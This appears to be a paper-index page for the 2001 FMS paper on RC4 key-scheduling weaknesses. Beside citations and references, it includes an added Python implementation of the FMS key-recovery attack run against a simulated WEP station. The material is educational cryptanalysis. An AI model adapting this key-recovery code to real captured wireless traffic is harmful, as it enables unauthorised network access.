Weaknesses in the Key Scheduling Algorithm of RC4

@inproceedings{Fluhrer2001WeaknessesIT,
  title={Weaknesses in the Key Scheduling Algorithm of RC4},
  author={Scott R. Fluhrer and Itsik Mantin and Adi Shamir},
  booktitle={Selected Areas in Cryptography},
  year={2001}
}
In this paper we present several weaknesses in the key scheduling algorithm of RC4, and describe their cryptanalytic significance. [...] We use these weak keys to construct new distinguishers for RC4, and to mount related key attacks with practical complexities. Finally, we show that RC4 is completely insecure in a common mode of operation which is used in the widely deployed Wired Equivalent Privacy protocol (WEP, which is part of the 802.11 standard), in which a fixed secret key is concatenated…
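The WEP mode the abstract refers to prepends a public 3-byte IV to a fixed secret key, so RC4's KSA is run on K = IV || secret with the first three key bytes chosen by whoever sends the frame. What follows is an added example, not code from the paper or from any WEP implementation: it implements RC4's KSA and PRGA, simulates a WEP station encrypting frames under the weak IVs (A+3, 255, X), and runs the FMS byte-by-byte key recovery against it. The names fms_candidate, recover_wep_key, attack_success_rate and the capture callback are this example's own. The only protocol facts it assumes are that WEP uses K = IV || secret and that every WEP data frame starts with the LLC/SNAP byte 0xAA, which hands the eavesdropper the first keystream byte of every frame.

```python
"""FMS weak-IV attack on RC4 as used in WEP (K = IV || secret), simulated end to end.
Added example; the attack functions and the WEP model are this file's own."""
import random
from collections import Counter


def ksa(key: bytes) -> list[int]:
    """RC4 key-scheduling algorithm: derive the initial permutation S from the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def prga(S: list[int], n: int) -> bytes:
    """RC4 pseudo-random generation: emit n keystream bytes from permutation S."""
    S = S[:]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_keystream(key: bytes, n: int) -> bytes:
    return prga(ksa(key), n)


SNAP_DSAP = 0xAA  # first plaintext byte of every WEP data frame (LLC/SNAP header)


def wep_frame_first_byte(iv: bytes, secret: bytes) -> int:
    """Victim side: WEP concatenates the 3-byte IV and the secret key and RC4-encrypts
    the frame. Returns the first ciphertext byte an eavesdropper sees for this IV."""
    return rc4_keystream(iv + secret, 1)[0] ^ SNAP_DSAP


def fms_candidate(iv: bytes, known_secret: bytes, ks0: int):
    """One FMS vote for secret byte number A = len(known_secret).
    Simulates the first A+3 KSA steps (every key byte used there is known), checks the
    'resolved' condition, and if it holds inverts the next step's swap to obtain a
    candidate for K[A+3]. Returns None when this IV is not resolved."""
    A = len(known_secret)
    key = iv + known_secret          # K[0..A+2]: everything the attacker knows so far
    S = list(range(256))
    j = 0
    for i in range(A + 3):
        j = (j + S[i] + key[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Resolved condition: the first PRGA output will be S[A+3] unless a later KSA
    # step touches index 1, S[1] or A+3 (all three survive with prob ~e^-3 ~ 5%).
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None
    S_inv = [0] * 256
    for idx, val in enumerate(S):
        S_inv[val] = idx
    # Step A+3 sets j' = j + S[A+3] + K[A+3] and swaps S[A+3] <-> S[j'], so when the
    # output really is S[A+3] we have S_inv[ks0] == j' and can solve for K[A+3].
    return (S_inv[ks0] - j - S[A + 3]) & 0xFF


def recover_wep_key(key_len: int, capture) -> bytes:
    """Attacker side. capture(iv) returns the first ciphertext byte of a frame sent
    under that IV. Uses only the classic weak IVs (A+3, 255, X), 256 per key byte."""
    recovered = bytearray()
    for A in range(key_len):
        votes = Counter()
        for X in range(256):
            iv = bytes([A + 3, 255, X])
            ks0 = capture(iv) ^ SNAP_DSAP   # known plaintext byte -> keystream byte
            cand = fms_candidate(iv, bytes(recovered), ks0)
            if cand is not None:
                votes[cand] += 1
        recovered.append(votes.most_common(1)[0][0])
    return bytes(recovered)


def attack_success_rate(trials: int, key_len: int = 5, seed: int = 1) -> float:
    """Run the attack against `trials` random secret keys (constructed with a seeded
    RNG); return the fraction of keys recovered exactly."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        secret = bytes(rng.randrange(256) for _ in range(key_len))
        if recover_wep_key(key_len, lambda iv: wep_frame_first_byte(iv, secret)) == secret:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    secret = bytes.fromhex("0badc0ffee")   # constructed 40-bit WEP key
    print("recovered:", recover_wep_key(5, lambda iv: wep_frame_first_byte(iv, secret)).hex())
    print("success rate over 20 random keys:", attack_success_rate(20))
```

Each resolved weak IV points at the right key byte with probability around e^-3, roughly 5%, and the remaining votes are spread almost uniformly over the 256 values, so 256 chosen IVs per position give a clear winner most of the time; the attack is still probabilistic, which attack_success_rate makes visible. The resolved check in fms_candidate applies to any captured IV, not only the (A+3, 255, X) family, but a passive attacker cannot choose IVs, which is why the original WEP attacks needed far more captured frames than the 256 per byte used here.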
Citations

New Weakness in the Key-Scheduling Algorithm of RC4
This paper proposes a method to recover an l-bit secret key from only the first l bits of the initial state of RC4 using linear equations, with a time complexity less than that of one execution of the KSA.
Passive-Only Key Recovery Attacks on RC4
A passive-only attack that significantly improves the key recovery process on WEP, with a data complexity of 2^15 eavesdropped packets, is described.
A New Practical Key Recovery Attack on the Stream Cipher RC4 under Related-Key Model
A new key recovery attack on RC4 under a related-key model is presented, based on the property that RC4 generates a large number of colliding key pairs; under the proposed related-key model it recovers any random key in practical time when the key is long.
KSAm - An Improved RC4 Key-Scheduling Algorithm for Securing WEP
A new variant of the RC4 key-scheduling algorithm, called KSAm, is proposed, whose primary goal is to address the FMS (Fluhrer-Mantin-Shamir) weakness of WEP-like cryptosystems, where the IV precedes the secret key.
A Scheme for Key Management on Alternate Temporal Key Hash
This paper proposes a scheme to make key management feasible in the ATKH solution without changing the framework of the ATKH or the existing 802.11 standards.
Analysis of selected methods for the recovery of encrypted WEP key
This paper deals with some of the WEP (Wired Equivalent Privacy) key recovery methods based on the aircrack-ng software, which was embedded in the BackTrack operating system (Linux distribution). …
Expanding Weak-key Space of RC4
This attack is the best-known single-key key recovery attack on RC4 with respect to efficiency and is applicable to any keystream, while Teramura et al. …
Cryptanalysis of KSAm-like Algorithms
B. Crainicu, B. Iantovics. 2008 First International Conference on Complexity and Intelligence of the Artificial and Natural Complex Systems. Medical Applications of the Complex Systems. Biomedical Computing, 2008.
A new variant of the key-scheduling algorithm, called KSAm, is proposed, whose primary goal is to address the Fluhrer-Mantin-Shamir (FMS) weakness of WEP-like cryptosystems, where the IV (initialization vector) precedes the secret key.
New Form of Permutation Bias and Secret Key Leakage in Keystream Bytes of RC4
A complete framework is presented to show that many keystream output bytes of RC4 are significantly biased towards several linear combinations of the secret key bytes, and that these biases propagate further once the information for the index j is revealed.

References

(showing 10 of the paper's 22 references)
A Related-Key Cryptanalysis of RC4
Analysis of the RC4 stream cipher shows that for each 2048-bit key there exists a family of related keys, differing in one of the byte positions, and recommends that applications of RC4 with keys longer than 128 bits discard the initial 256 bytes of keystream output.
Cryptanalysis of RC4-like Ciphers
This analysis shows that, although full-size RC4 remains secure against known attacks, keystreams are distinguishable from randomly generated bit streams, and the RC4 key can be recovered if a significant fraction of the full cycle of keystream bits is generated.
A Practical Attack on Broadcast RC4
A major statistical weakness in RC4 makes it trivial to distinguish between short outputs of RC4 and random strings by analyzing their second bytes, which can be used to mount a practical ciphertext-only attack on RC4 in some broadcast applications.
Real Time Cryptanalysis of A5/1 on a PC
New attacks on A5/1 are described, based on subtle flaws in the tap structure of the registers, their non-invertible clocking mechanism, and their frequent resets, which make it vulnerable to hardware-based attacks by large organizations, but not to software-based attacks on multiple targets by hackers.
Analysis Methods for (Alleged) RC4
The analysis methods reveal intrinsic properties of alleged RC4 which are independent of the key scheduling and the key size; the complexity of one of the attacks is estimated to be less than the time of searching through the square root of all possible initial states.
Using the Fluhrer, Mantin, and Shamir Attack to Break WEP
It is concluded that 802.11 WEP is totally insecure, and some recommendations are provided to make the attack more efficient.
Statistical Analysis of the Alleged RC4 Keystream Generator
A method for distinguishing 8-bit RC4 from randomness is demonstrated, and it is observed that an attacker can, on occasion, determine portions of the internal state with nontrivial probability.
Linear Statistical Weakness of Alleged RC4 Keystream Generator
J. Golic. EUROCRYPT, 1997.
A keystream generator known as RC4 is analyzed by the linear model approach. It is shown that the second binary derivative of the least significant bit output sequence is correlated to 1 with the…
Wireless lan medium access control (mac) and physical layer (phy) specifications
…services are specified here by describing the service primitives and parameters that characterize each service. This definition is independent of any particular implementation. In particular, the…
Wireless lan medium access control (mac) and physical layer (phy) specifications
The medium access control (MAC) and physical characteristics for wireless local area networks (LANs) are specified in this standard, part of a series of standards for local and metropolitan area…